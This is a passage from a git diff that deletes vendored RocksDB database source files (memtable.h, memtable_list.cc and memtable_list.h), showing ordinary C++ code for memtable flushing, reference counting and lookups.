-  // Returns an estimate of the number of bytes of data in use by this
-  // data structure.
-  //
-  // REQUIRES: external synchronization to prevent simultaneous
-  // operations on the same MemTable (unless this Memtable is immutable).
-  size_t ApproximateMemoryUsage();
-
-  // This method heuristically determines if the memtable should continue to
-  // host more data.
-  bool ShouldScheduleFlush() const {
-    return flush_state_.load(std::memory_order_relaxed) == FLUSH_REQUESTED;
-  }
-
-  // Returns true if a flush should be scheduled and the caller should
-  // be the one to schedule it
-  bool MarkFlushScheduled() {
-    auto before = FLUSH_REQUESTED;
-    return flush_state_.compare_exchange_strong(before, FLUSH_SCHEDULED,
-                                                std::memory_order_relaxed,
-                                                std::memory_order_relaxed);
-  }
-
-  // Return an iterator that yields the contents of the memtable.
-  //
-  // The caller must ensure that the underlying MemTable remains live
-  // while the returned iterator is live.  The keys returned by this
-  // iterator are internal keys encoded by AppendInternalKey in the
-  // db/dbformat.{h,cc} module.
-  //
-  // By default, it returns an iterator for prefix seek if prefix_extractor
-  // is configured in Options.
-  // arena: If not null, the arena needs to be used to allocate the Iterator.
-  //        Calling ~Iterator of the iterator will destroy all the states but
-  //        those allocated in arena.
-  InternalIterator* NewIterator(const ReadOptions& read_options, Arena* arena);
-
-  InternalIterator* NewRangeTombstoneIterator(const ReadOptions& read_options);
-
-  // Add an entry into memtable that maps key to value at the
-  // specified sequence number and with the specified type.
-  // Typically value will be empty if type==kTypeDeletion.
-  //
-  // REQUIRES: if allow_concurrent = false, external synchronization to prevent
-  // simultaneous operations on the same MemTable.
-  void Add(SequenceNumber seq, ValueType type, const Slice& key,
-           const Slice& value, bool allow_concurrent = false,
-           MemTablePostProcessInfo* post_process_info = nullptr);
-
-  // If memtable contains a value for key, store it in *value and return true.
-  // If memtable contains a deletion for key, store a NotFound() error
-  // in *status and return true.
-  // If memtable contains Merge operation as the most recent entry for a key,
-  //   and the merge process does not stop (not reaching a value or delete),
-  //   prepend the current merge operand to *operands.
-  //   store MergeInProgress in s, and return false.
-  // Else, return false.
-  // If any operation was found, its most recent sequence number
-  // will be stored in *seq on success (regardless of whether true/false is
-  // returned).  Otherwise, *seq will be set to kMaxSequenceNumber.
-  // On success, *s may be set to OK, NotFound, or MergeInProgress.  Any other
-  // status returned indicates a corruption or other unexpected error.
-  bool Get(const LookupKey& key, std::string* value, Status* s,
-           MergeContext* merge_context, RangeDelAggregator* range_del_agg,
-           SequenceNumber* seq, const ReadOptions& read_opts,
-           bool* is_blob_index = nullptr);
-
-  bool Get(const LookupKey& key, std::string* value, Status* s,
-           MergeContext* merge_context, RangeDelAggregator* range_del_agg,
-           const ReadOptions& read_opts, bool* is_blob_index = nullptr) {
-    SequenceNumber seq;
-    return Get(key, value, s, merge_context, range_del_agg, &seq, read_opts,
-               is_blob_index);
-  }
-
-  // Attempts to update the new_value inplace, else does normal Add
-  // Pseudocode
-  //   if key exists in current memtable && prev_value is of type kTypeValue
-  //     if new sizeof(new_value) <= sizeof(prev_value)
-  //       update inplace
-  //     else add(key, new_value)
-  //   else add(key, new_value)
-  //
-  // REQUIRES: external synchronization to prevent simultaneous
-  // operations on the same MemTable.
-  void Update(SequenceNumber seq,
-              const Slice& key,
-              const Slice& value);
-
-  // If prev_value for key exists, attempts to update it inplace.
-  // else returns false
-  // Pseudocode
-  //   if key exists in current memtable && prev_value is of type kTypeValue
-  //     new_value = delta(prev_value)
-  //     if sizeof(new_value) <= sizeof(prev_value)
-  //       update inplace
-  //     else add(key, new_value)
-  //   else return false
-  //
-  // REQUIRES: external synchronization to prevent simultaneous
-  // operations on the same MemTable.
-  bool UpdateCallback(SequenceNumber seq,
-                      const Slice& key,
-                      const Slice& delta);
-
-  // Returns the number of successive merge entries starting from the newest
-  // entry for the key up to the last non-merge entry or last entry for the
-  // key in the memtable.
-  size_t CountSuccessiveMergeEntries(const LookupKey& key);
-
-  // Update counters and flush status after inserting a whole write batch
-  // Used in concurrent memtable inserts.
-  void BatchPostProcess(const MemTablePostProcessInfo& update_counters) {
-    num_entries_.fetch_add(update_counters.num_entries,
-                           std::memory_order_relaxed);
-    data_size_.fetch_add(update_counters.data_size, std::memory_order_relaxed);
-    if (update_counters.num_deletes != 0) {
-      num_deletes_.fetch_add(update_counters.num_deletes,
-                             std::memory_order_relaxed);
-    }
-    UpdateFlushState();
-  }
-
-  // Get total number of entries in the mem table.
-  // REQUIRES: external synchronization to prevent simultaneous
-  // operations on the same MemTable (unless this Memtable is immutable).
-  uint64_t num_entries() const {
-    return num_entries_.load(std::memory_order_relaxed);
-  }
-
-  // Get total number of deletes in the mem table.
-  // REQUIRES: external synchronization to prevent simultaneous
-  // operations on the same MemTable (unless this Memtable is immutable).
-  uint64_t num_deletes() const {
-    return num_deletes_.load(std::memory_order_relaxed);
-  }
-
-  // Dynamically change the memtable's capacity. If set below the current usage,
-  // the next key added will trigger a flush. Can only increase size when
-  // memtable prefix bloom is disabled, since we can't easily allocate more
-  // space.
-  void UpdateWriteBufferSize(size_t new_write_buffer_size) {
-    if (prefix_bloom_ == nullptr ||
-        new_write_buffer_size < write_buffer_size_) {
-      write_buffer_size_.store(new_write_buffer_size,
-                               std::memory_order_relaxed);
-    }
-  }
-
-  // Returns the edits area that is needed for flushing the memtable
-  VersionEdit* GetEdits() { return &edit_; }
-
-  // Returns if there is no entry inserted to the mem table.
-  // REQUIRES: external synchronization to prevent simultaneous
-  // operations on the same MemTable (unless this Memtable is immutable).
-  bool IsEmpty() const { return first_seqno_ == 0; }
-
-  // Returns the sequence number of the first element that was inserted
-  // into the memtable.
-  // REQUIRES: external synchronization to prevent simultaneous
-  // operations on the same MemTable (unless this Memtable is immutable).
-  SequenceNumber GetFirstSequenceNumber() {
-    return first_seqno_.load(std::memory_order_relaxed);
-  }
-
-  // Returns the sequence number that is guaranteed to be smaller than or equal
-  // to the sequence number of any key that could be inserted into this
-  // memtable. It can then be assumed that any write with a larger(or equal)
-  // sequence number will be present in this memtable or a later memtable.
-  //
-  // If the earliest sequence number could not be determined,
-  // kMaxSequenceNumber will be returned.
-  SequenceNumber GetEarliestSequenceNumber() {
-    return earliest_seqno_.load(std::memory_order_relaxed);
-  }
-
-  // DB's latest sequence ID when the memtable is created. This number
-  // may be updated to a more recent one before any key is inserted.
-  SequenceNumber GetCreationSeq() const { return creation_seq_; }
-
-  void SetCreationSeq(SequenceNumber sn) { creation_seq_ = sn; }
-
-  // Returns the next active logfile number when this memtable is about to
-  // be flushed to storage
-  // REQUIRES: external synchronization to prevent simultaneous
-  // operations on the same MemTable.
-  uint64_t GetNextLogNumber() { return mem_next_logfile_number_; }
-
-  // Sets the next active logfile number when this memtable is about to
-  // be flushed to storage
-  // REQUIRES: external synchronization to prevent simultaneous
-  // operations on the same MemTable.
-  void SetNextLogNumber(uint64_t num) { mem_next_logfile_number_ = num; }
-
-  // if this memtable contains data from a committed
-  // two phase transaction we must take note of the
-  // log which contains that data so we can know
-  // when to relese that log
-  void RefLogContainingPrepSection(uint64_t log);
-  uint64_t GetMinLogContainingPrepSection();
-
-  // Notify the underlying storage that no more items will be added.
-  // REQUIRES: external synchronization to prevent simultaneous
-  // operations on the same MemTable.
-  // After MarkImmutable() is called, you should not attempt to
-  // write anything to this MemTable().  (Ie. do not call Add() or Update()).
-  void MarkImmutable() {
-    table_->MarkReadOnly();
-    mem_tracker_.DoneAllocating();
-  }
-
-  // return true if the current MemTableRep supports merge operator.
-  bool IsMergeOperatorSupported() const {
-    return table_->IsMergeOperatorSupported();
-  }
-
-  // return true if the current MemTableRep supports snapshots.
-  // inplace update prevents snapshots,
-  bool IsSnapshotSupported() const {
-    return table_->IsSnapshotSupported() && !moptions_.inplace_update_support;
-  }
-
-  struct MemTableStats {
-    uint64_t size;
-    uint64_t count;
-  };
-
-  MemTableStats ApproximateStats(const Slice& start_ikey,
-                                 const Slice& end_ikey);
-
-  // Get the lock associated for the key
-  port::RWMutex* GetLock(const Slice& key);
-
-  const InternalKeyComparator& GetInternalKeyComparator() const {
-    return comparator_.comparator;
-  }
-
-  const ImmutableMemTableOptions* GetImmutableMemTableOptions() const {
-    return &moptions_;
-  }
-
-  uint64_t ApproximateOldestKeyTime() const {
-    return oldest_key_time_.load(std::memory_order_relaxed);
-  }
-
- private:
-  enum FlushStateEnum { FLUSH_NOT_REQUESTED, FLUSH_REQUESTED, FLUSH_SCHEDULED };
-
-  friend class MemTableIterator;
-  friend class MemTableBackwardIterator;
-  friend class MemTableList;
-
-  KeyComparator comparator_;
-  const ImmutableMemTableOptions moptions_;
-  int refs_;
-  const size_t kArenaBlockSize;
-  AllocTracker mem_tracker_;
-  ConcurrentArena arena_;
-  unique_ptr<MemTableRep> table_;
-  unique_ptr<MemTableRep> range_del_table_;
-  bool is_range_del_table_empty_;
-
-  // Total data size of all data inserted
-  std::atomic<uint64_t> data_size_;
-  std::atomic<uint64_t> num_entries_;
-  std::atomic<uint64_t> num_deletes_;
-
-  // Dynamically changeable memtable option
-  std::atomic<size_t> write_buffer_size_;
-
-  // These are used to manage memtable flushes to storage
-  bool flush_in_progress_; // started the flush
-  bool flush_completed_;   // finished the flush
-  uint64_t file_number_;    // filled up after flush is complete
-
-  // The updates to be applied to the transaction log when this
-  // memtable is flushed to storage.
-  VersionEdit edit_;
-
-  // The sequence number of the kv that was inserted first
-  std::atomic<SequenceNumber> first_seqno_;
-
-  // The db sequence number at the time of creation or kMaxSequenceNumber
-  // if not set.
-  std::atomic<SequenceNumber> earliest_seqno_;
-
-  SequenceNumber creation_seq_;
-
-  // The log files earlier than this number can be deleted.
-  uint64_t mem_next_logfile_number_;
-
-  // the earliest log containing a prepared section
-  // which has been inserted into this memtable.
-  std::atomic<uint64_t> min_prep_log_referenced_;
-
-  // rw locks for inplace updates
-  std::vector<port::RWMutex> locks_;
-
-  const SliceTransform* const prefix_extractor_;
-  std::unique_ptr<DynamicBloom> prefix_bloom_;
-
-  std::atomic<FlushStateEnum> flush_state_;
-
-  Env* env_;
-
-  // Extract sequential insert prefixes.
-  const SliceTransform* insert_with_hint_prefix_extractor_;
-
-  // Insert hints for each prefix.
-  std::unordered_map<Slice, void*, SliceHasher> insert_hints_;
-
-  // Timestamp of oldest key
-  std::atomic<uint64_t> oldest_key_time_;
-
-  // Returns a heuristic flush decision
-  bool ShouldFlushNow() const;
-
-  // Updates flush_state_ using ShouldFlushNow()
-  void UpdateFlushState();
-
-  void UpdateOldestKeyTime();
-
-  // No copying allowed
-  MemTable(const MemTable&);
-  MemTable& operator=(const MemTable&);
-};
-
-extern const char* EncodeKey(std::string* scratch, const Slice& target);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/memtable_list.cc b/thirdparty/rocksdb/db/memtable_list.cc
deleted file mode 100644
index 5921a50..0000000
--- a/thirdparty/rocksdb/db/memtable_list.cc
+++ /dev/null
@@ -1,486 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include "db/memtable_list.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <limits>
-#include <string>
-#include "db/memtable.h"
-#include "db/version_set.h"
-#include "monitoring/thread_status_util.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "table/merging_iterator.h"
-#include "util/coding.h"
-#include "util/log_buffer.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-class InternalKeyComparator;
-class Mutex;
-class VersionSet;
-
-void MemTableListVersion::AddMemTable(MemTable* m) {
-  memlist_.push_front(m);
-  *parent_memtable_list_memory_usage_ += m->ApproximateMemoryUsage();
-}
-
-void MemTableListVersion::UnrefMemTable(autovector<MemTable*>* to_delete,
-                                        MemTable* m) {
-  if (m->Unref()) {
-    to_delete->push_back(m);
-    assert(*parent_memtable_list_memory_usage_ >= m->ApproximateMemoryUsage());
-    *parent_memtable_list_memory_usage_ -= m->ApproximateMemoryUsage();
-  } else {
-  }
-}
-
-MemTableListVersion::MemTableListVersion(
-    size_t* parent_memtable_list_memory_usage, MemTableListVersion* old)
-    : max_write_buffer_number_to_maintain_(
-          old->max_write_buffer_number_to_maintain_),
-      parent_memtable_list_memory_usage_(parent_memtable_list_memory_usage) {
-  if (old != nullptr) {
-    memlist_ = old->memlist_;
-    for (auto& m : memlist_) {
-      m->Ref();
-    }
-
-    memlist_history_ = old->memlist_history_;
-    for (auto& m : memlist_history_) {
-      m->Ref();
-    }
-  }
-}
-
-MemTableListVersion::MemTableListVersion(
-    size_t* parent_memtable_list_memory_usage,
-    int max_write_buffer_number_to_maintain)
-    : max_write_buffer_number_to_maintain_(max_write_buffer_number_to_maintain),
-      parent_memtable_list_memory_usage_(parent_memtable_list_memory_usage) {}
-
-void MemTableListVersion::Ref() { ++refs_; }
-
-// called by superversion::clean()
-void MemTableListVersion::Unref(autovector<MemTable*>* to_delete) {
-  assert(refs_ >= 1);
-  --refs_;
-  if (refs_ == 0) {
-    // if to_delete is equal to nullptr it means we're confident
-    // that refs_ will not be zero
-    assert(to_delete != nullptr);
-    for (const auto& m : memlist_) {
-      UnrefMemTable(to_delete, m);
-    }
-    for (const auto& m : memlist_history_) {
-      UnrefMemTable(to_delete, m);
-    }
-    delete this;
-  }
-}
-
-int MemTableList::NumNotFlushed() const {
-  int size = static_cast<int>(current_->memlist_.size());
-  assert(num_flush_not_started_ <= size);
-  return size;
-}
-
-int MemTableList::NumFlushed() const {
-  return static_cast<int>(current_->memlist_history_.size());
-}
-
-// Search all the memtables starting from the most recent one.
-// Return the most recent value found, if any.
-// Operands stores the list of merge operations to apply, so far.
-bool MemTableListVersion::Get(const LookupKey& key, std::string* value,
-                              Status* s, MergeContext* merge_context,
-                              RangeDelAggregator* range_del_agg,
-                              SequenceNumber* seq, const ReadOptions& read_opts,
-                              bool* is_blob_index) {
-  return GetFromList(&memlist_, key, value, s, merge_context, range_del_agg,
-                     seq, read_opts, is_blob_index);
-}
-
-bool MemTableListVersion::GetFromHistory(
-    const LookupKey& key, std::string* value, Status* s,
-    MergeContext* merge_context, RangeDelAggregator* range_del_agg,
-    SequenceNumber* seq, const ReadOptions& read_opts, bool* is_blob_index) {
-  return GetFromList(&memlist_history_, key, value, s, merge_context,
-                     range_del_agg, seq, read_opts, is_blob_index);
-}
-
-bool MemTableListVersion::GetFromList(
-    std::list<MemTable*>* list, const LookupKey& key, std::string* value,
-    Status* s, MergeContext* merge_context, RangeDelAggregator* range_del_agg,
-    SequenceNumber* seq, const ReadOptions& read_opts, bool* is_blob_index) {
-  *seq = kMaxSequenceNumber;
-
-  for (auto& memtable : *list) {
-    SequenceNumber current_seq = kMaxSequenceNumber;
-
-    bool done = memtable->Get(key, value, s, merge_context, range_del_agg,
-                              &current_seq, read_opts, is_blob_index);
-    if (*seq == kMaxSequenceNumber) {
-      // Store the most recent sequence number of any operation on this key.
-      // Since we only care about the most recent change, we only need to
-      // return the first operation found when searching memtables in
-      // reverse-chronological order.
-      *seq = current_seq;
-    }
-
-    if (done) {
-      assert(*seq != kMaxSequenceNumber);
-      return true;
-    }
-    if (!done && !s->ok() && !s->IsMergeInProgress() && !s->IsNotFound()) {
-      return false;
-    }
-  }
-  return false;
-}
-
-Status MemTableListVersion::AddRangeTombstoneIterators(
-    const ReadOptions& read_opts, Arena* arena,
-    RangeDelAggregator* range_del_agg) {
-  assert(range_del_agg != nullptr);
-  for (auto& m : memlist_) {
-    std::unique_ptr<InternalIterator> range_del_iter(
-        m->NewRangeTombstoneIterator(read_opts));
-    Status s = range_del_agg->AddTombstones(std::move(range_del_iter));
-    if (!s.ok()) {
-      return s;
-    }
-  }
-  return Status::OK();
-}
-
-Status MemTableListVersion::AddRangeTombstoneIterators(
-    const ReadOptions& read_opts,
-    std::vector<InternalIterator*>* range_del_iters) {
-  for (auto& m : memlist_) {
-    auto* range_del_iter = m->NewRangeTombstoneIterator(read_opts);
-    if (range_del_iter != nullptr) {
-      range_del_iters->push_back(range_del_iter);
-    }
-  }
-  return Status::OK();
-}
-
-void MemTableListVersion::AddIterators(
-    const ReadOptions& options, std::vector<InternalIterator*>* iterator_list,
-    Arena* arena) {
-  for (auto& m : memlist_) {
-    iterator_list->push_back(m->NewIterator(options, arena));
-  }
-}
-
-void MemTableListVersion::AddIterators(
-    const ReadOptions& options, MergeIteratorBuilder* merge_iter_builder) {
-  for (auto& m : memlist_) {
-    merge_iter_builder->AddIterator(
-        m->NewIterator(options, merge_iter_builder->GetArena()));
-  }
-}
-
-uint64_t MemTableListVersion::GetTotalNumEntries() const {
-  uint64_t total_num = 0;
-  for (auto& m : memlist_) {
-    total_num += m->num_entries();
-  }
-  return total_num;
-}
-
-MemTable::MemTableStats MemTableListVersion::ApproximateStats(
-    const Slice& start_ikey, const Slice& end_ikey) {
-  MemTable::MemTableStats total_stats = {0, 0};
-  for (auto& m : memlist_) {
-    auto mStats = m->ApproximateStats(start_ikey, end_ikey);
-    total_stats.size += mStats.size;
-    total_stats.count += mStats.count;
-  }
-  return total_stats;
-}
-
-uint64_t MemTableListVersion::GetTotalNumDeletes() const {
-  uint64_t total_num = 0;
-  for (auto& m : memlist_) {
-    total_num += m->num_deletes();
-  }
-  return total_num;
-}
-
-SequenceNumber MemTableListVersion::GetEarliestSequenceNumber(
-    bool include_history) const {
-  if (include_history && !memlist_history_.empty()) {
-    return memlist_history_.back()->GetEarliestSequenceNumber();
-  } else if (!memlist_.empty()) {
-    return memlist_.back()->GetEarliestSequenceNumber();
-  } else {
-    return kMaxSequenceNumber;
-  }
-}
-
-// caller is responsible for referencing m
-void MemTableListVersion::Add(MemTable* m, autovector<MemTable*>* to_delete) {
-  assert(refs_ == 1);  // only when refs_ == 1 is MemTableListVersion mutable
-  AddMemTable(m);
-
-  TrimHistory(to_delete);
-}
-
-// Removes m from list of memtables not flushed.  Caller should NOT Unref m.
-void MemTableListVersion::Remove(MemTable* m,
-                                 autovector<MemTable*>* to_delete) {
-  assert(refs_ == 1);  // only when refs_ == 1 is MemTableListVersion mutable
-  memlist_.remove(m);
-
-  if (max_write_buffer_number_to_maintain_ > 0) {
-    memlist_history_.push_front(m);
-    TrimHistory(to_delete);
-  } else {
-    UnrefMemTable(to_delete, m);
-  }
-}
-
-// Make sure we don't use up too much space in history
-void MemTableListVersion::TrimHistory(autovector<MemTable*>* to_delete) {
-  while (memlist_.size() + memlist_history_.size() >
-             static_cast<size_t>(max_write_buffer_number_to_maintain_) &&
-         !memlist_history_.empty()) {
-    MemTable* x = memlist_history_.back();
-    memlist_history_.pop_back();
-
-    UnrefMemTable(to_delete, x);
-  }
-}
-
-// Returns true if there is at least one memtable on which flush has
-// not yet started.
-bool MemTableList::IsFlushPending() const {
-  if ((flush_requested_ && num_flush_not_started_ >= 1) ||
-      (num_flush_not_started_ >= min_write_buffer_number_to_merge_)) {
-    assert(imm_flush_needed.load(std::memory_order_relaxed));
-    return true;
-  }
-  return false;
-}
-
-// Returns the memtables that need to be flushed.
-void MemTableList::PickMemtablesToFlush(autovector<MemTable*>* ret) {
-  AutoThreadOperationStageUpdater stage_updater(
-      ThreadStatus::STAGE_PICK_MEMTABLES_TO_FLUSH);
-  const auto& memlist = current_->memlist_;
-  for (auto it = memlist.rbegin(); it != memlist.rend(); ++it) {
-    MemTable* m = *it;
-    if (!m->flush_in_progress_) {
-      assert(!m->flush_completed_);
-      num_flush_not_started_--;
-      if (num_flush_not_started_ == 0) {
-        imm_flush_needed.store(false, std::memory_order_release);
-      }
-      m->flush_in_progress_ = true;  // flushing will start very soon
-      ret->push_back(m);
-    }
-  }
-  flush_requested_ = false;  // start-flush request is complete
-}
-
-void MemTableList::RollbackMemtableFlush(const autovector<MemTable*>& mems,
-                                         uint64_t file_number) {
-  AutoThreadOperationStageUpdater stage_updater(
-      ThreadStatus::STAGE_MEMTABLE_ROLLBACK);
-  assert(!mems.empty());
-
-  // If the flush was not successful, then just reset state.
-  // Maybe a succeeding attempt to flush will be successful.
-  for (MemTable* m : mems) {
-    assert(m->flush_in_progress_);
-    assert(m->file_number_ == 0);
-
-    m->flush_in_progress_ = false;
-    m->flush_completed_ = false;
-    m->edit_.Clear();
-    num_flush_not_started_++;
-  }
-  imm_flush_needed.store(true, std::memory_order_release);
-}
-
-// Record a successful flush in the manifest file
-Status MemTableList::InstallMemtableFlushResults(
-    ColumnFamilyData* cfd, const MutableCFOptions& mutable_cf_options,
-    const autovector<MemTable*>& mems, VersionSet* vset, InstrumentedMutex* mu,
-    uint64_t file_number, autovector<MemTable*>* to_delete,
-    Directory* db_directory, LogBuffer* log_buffer) {
-  AutoThreadOperationStageUpdater stage_updater(
-      ThreadStatus::STAGE_MEMTABLE_INSTALL_FLUSH_RESULTS);
-  mu->AssertHeld();
-
-  // flush was successful
-  for (size_t i = 0; i < mems.size(); ++i) {
-    // All the edits are associated with the first memtable of this batch.
-    assert(i == 0 || mems[i]->GetEdits()->NumEntries() == 0);
-
-    mems[i]->flush_completed_ = true;
-    mems[i]->file_number_ = file_number;
-  }
-
-  // if some other thread is already committing, then return
-  Status s;
-  if (commit_in_progress_) {
-    TEST_SYNC_POINT("MemTableList::InstallMemtableFlushResults:InProgress");
-    return s;
-  }
-
-  // Only a single thread can be executing this piece of code
-  commit_in_progress_ = true;
-
-  // Retry until all completed flushes are committed. New flushes can finish
-  // while the current thread is writing manifest where mutex is released.
-  while (s.ok()) {
-    auto& memlist = current_->memlist_;
-    if (memlist.empty() || !memlist.back()->flush_completed_) {
-      break;
-    }
-    // scan all memtables from the earliest, and commit those
-    // (in that order) that have finished flushing. Memetables
-    // are always committed in the order that they were created.
-    uint64_t batch_file_number = 0;
-    size_t batch_count = 0;
-    autovector<VersionEdit*> edit_list;
-    // enumerate from the last (earliest) element to see how many batch finished
-    for (auto it = memlist.rbegin(); it != memlist.rend(); ++it) {
-      MemTable* m = *it;
-      if (!m->flush_completed_) {
-        break;
-      }
-      if (it == memlist.rbegin() || batch_file_number != m->file_number_) {
-        batch_file_number = m->file_number_;
-        ROCKS_LOG_BUFFER(log_buffer,
-                         "[%s] Level-0 commit table #%" PRIu64 " started",
-                         cfd->GetName().c_str(), m->file_number_);
-        edit_list.push_back(&m->edit_);
-      }
-      batch_count++;
-    }
-
-    if (batch_count > 0) {
-      // this can release and reacquire the mutex.
-      s = vset->LogAndApply(cfd, mutable_cf_options, edit_list, mu,
-                            db_directory);
-
-      // we will be changing the version in the next code path,
-      // so we better create a new one, since versions are immutable
-      InstallNewVersion();
-
-      // All the later memtables that have the same filenum
-      // are part of the same batch. They can be committed now.
-      uint64_t mem_id = 1;  // how many memtables have been flushed.
-      if (s.ok()) {         // commit new state
-        while (batch_count-- > 0) {
-          MemTable* m = current_->memlist_.back();
-          ROCKS_LOG_BUFFER(log_buffer, "[%s] Level-0 commit table #%" PRIu64
-                                       ": memtable #%" PRIu64 " done",
-                           cfd->GetName().c_str(), m->file_number_, mem_id);
-          assert(m->file_number_ > 0);
-          current_->Remove(m, to_delete);
-          ++mem_id;
-        }
-      } else {
-        for (auto it = current_->memlist_.rbegin(); batch_count-- > 0; it++) {
-          MemTable* m = *it;
-          // commit failed. setup state so that we can flush again.
-          ROCKS_LOG_BUFFER(log_buffer, "Level-0 commit table #%" PRIu64
-                                       ": memtable #%" PRIu64 " failed",
-                           m->file_number_, mem_id);
-          m->flush_completed_ = false;
-          m->flush_in_progress_ = false;
-          m->edit_.Clear();
-          num_flush_not_started_++;
-          m->file_number_ = 0;
-          imm_flush_needed.store(true, std::memory_order_release);
-          ++mem_id;
-        }
-      }
-    }
-  }
-  commit_in_progress_ = false;
-  return s;
-}
-
-// New memtables are inserted at the front of the list.
-void MemTableList::Add(MemTable* m, autovector<MemTable*>* to_delete) {
-  assert(static_cast<int>(current_->memlist_.size()) >= num_flush_not_started_);
-  InstallNewVersion();
-  // this method is used to move mutable memtable into an immutable list.
-  // since mutable memtable is already refcounted by the DBImpl,
-  // and when moving to the imutable list we don't unref it,
-  // we don't have to ref the memtable here. we just take over the
-  // reference from the DBImpl.
-  current_->Add(m, to_delete);
-  m->MarkImmutable();
-  num_flush_not_started_++;
-  if (num_flush_not_started_ == 1) {
-    imm_flush_needed.store(true, std::memory_order_release);
-  }
-}
-
-// Returns an estimate of the number of bytes of data in use.
-size_t MemTableList::ApproximateUnflushedMemTablesMemoryUsage() {
-  size_t total_size = 0;
-  for (auto& memtable : current_->memlist_) {
-    total_size += memtable->ApproximateMemoryUsage();
-  }
-  return total_size;
-}
-
-size_t MemTableList::ApproximateMemoryUsage() { return current_memory_usage_; }
-
-uint64_t MemTableList::ApproximateOldestKeyTime() const {
-  if (!current_->memlist_.empty()) {
-    return current_->memlist_.back()->ApproximateOldestKeyTime();
-  }
-  return std::numeric_limits<uint64_t>::max();
-}
-
-void MemTableList::InstallNewVersion() {
-  if (current_->refs_ == 1) {
-    // we're the only one using the version, just keep using it
-  } else {
-    // somebody else holds the current version, we need to create new one
-    MemTableListVersion* version = current_;
-    current_ = new MemTableListVersion(&current_memory_usage_, current_);
-    current_->Ref();
-    version->Unref();
-  }
-}
-
-uint64_t MemTableList::GetMinLogContainingPrepSection() {
-  uint64_t min_log = 0;
-
-  for (auto& m : current_->memlist_) {
-    // this mem has been flushed it no longer
-    // needs to hold on the its prep section
-    if (m->flush_completed_) {
-      continue;
-    }
-
-    auto log = m->GetMinLogContainingPrepSection();
-
-    if (log > 0 && (min_log == 0 || log < min_log)) {
-      min_log = log;
-    }
-  }
-
-  return min_log;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/memtable_list.h b/thirdparty/rocksdb/db/memtable_list.h
deleted file mode 100644
index 69038af..0000000
--- a/thirdparty/rocksdb/db/memtable_list.h
+++ /dev/null
@@ -1,265 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-
-#include <string>
-#include <list>
-#include <vector>
-#include <set>
-#include <deque>
-
-#include "db/dbformat.h"
-#include "db/memtable.h"
-#include "db/range_del_aggregator.h"
-#include "monitoring/instrumented_mutex.h"
-#include "rocksdb/db.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/options.h"
-#include "rocksdb/types.h"
-#include "util/autovector.h"
-#include "util/filename.h"
-#include "util/log_buffer.h"
-
-namespace rocksdb {
-
-class ColumnFamilyData;
-class InternalKeyComparator;
-class InstrumentedMutex;
-class MergeIteratorBuilder;
-
-// keeps a list of immutable memtables in a vector. the list is immutable
-// if refcount is bigger than one. It is used as a state for Get() and
-// Iterator code paths
-//
-// This class is not thread-safe.  External synchronization is required
-// (such as holding the db mutex or being on the write thread).
-class MemTableListVersion {
- public:
-  explicit MemTableListVersion(size_t* parent_memtable_list_memory_usage,
-                               MemTableListVersion* old = nullptr);
-  explicit MemTableListVersion(size_t* parent_memtable_list_memory_usage,
-                               int max_write_buffer_number_to_maintain);
-
-  void Ref();
-  void Unref(autovector<MemTable*>* to_delete = nullptr);
-
-  // Search all the memtables starting from the most recent one.
-  // Return the most recent value found, if any.
-  //
-  // If any operation was found for this key, its most recent sequence number
-  // will be stored in *seq on success (regardless of whether true/false is
-  // returned).  Otherwise, *seq will be set to kMaxSequenceNumber.
-  bool Get(const LookupKey& key, std::string* value, Status* s,
-           MergeContext* merge_context, RangeDelAggregator* range_del_agg,
-           SequenceNumber* seq, const ReadOptions& read_opts,
-           bool* is_blob_index = nullptr);
-
-  bool Get(const LookupKey& key, std::string* value, Status* s,
-           MergeContext* merge_context, RangeDelAggregator* range_del_agg,
-           const ReadOptions& read_opts, bool* is_blob_index = nullptr) {
-    SequenceNumber seq;
-    return Get(key, value, s, merge_context, range_del_agg, &seq, read_opts,
-               is_blob_index);
-  }
-
-  // Similar to Get(), but searches the Memtable history of memtables that
-  // have already been flushed.  Should only be used from in-memory only
-  // queries (such as Transaction validation) as the history may contain
-  // writes that are also present in the SST files.
-  bool GetFromHistory(const LookupKey& key, std::string* value, Status* s,
-                      MergeContext* merge_context,
-                      RangeDelAggregator* range_del_agg, SequenceNumber* seq,
-                      const ReadOptions& read_opts,
-                      bool* is_blob_index = nullptr);
-  bool GetFromHistory(const LookupKey& key, std::string* value, Status* s,
-                      MergeContext* merge_context,
-                      RangeDelAggregator* range_del_agg,
-                      const ReadOptions& read_opts,
-                      bool* is_blob_index = nullptr) {
-    SequenceNumber seq;
-    return GetFromHistory(key, value, s, merge_context, range_del_agg, &seq,
-                          read_opts, is_blob_index);
-  }
-
-  Status AddRangeTombstoneIterators(const ReadOptions& read_opts, Arena* arena,
-                                    RangeDelAggregator* range_del_agg);
-  Status AddRangeTombstoneIterators(
-      const ReadOptions& read_opts,
-      std::vector<InternalIterator*>* range_del_iters);
-
-  void AddIterators(const ReadOptions& options,
-                    std::vector<InternalIterator*>* iterator_list,
-                    Arena* arena);
-
-  void AddIterators(const ReadOptions& options,
-                    MergeIteratorBuilder* merge_iter_builder);
-
-  uint64_t GetTotalNumEntries() const;
-
-  uint64_t GetTotalNumDeletes() const;
-
-  MemTable::MemTableStats ApproximateStats(const Slice& start_ikey,
-                                           const Slice& end_ikey);
-
-  // Returns the value of MemTable::GetEarliestSequenceNumber() on the most
-  // recent MemTable in this list or kMaxSequenceNumber if the list is empty.
-  // If include_history=true, will also search Memtables in MemTableList
-  // History.
-  SequenceNumber GetEarliestSequenceNumber(bool include_history = false) const;
-
- private:
-  // REQUIRE: m is an immutable memtable
-  void Add(MemTable* m, autovector<MemTable*>* to_delete);
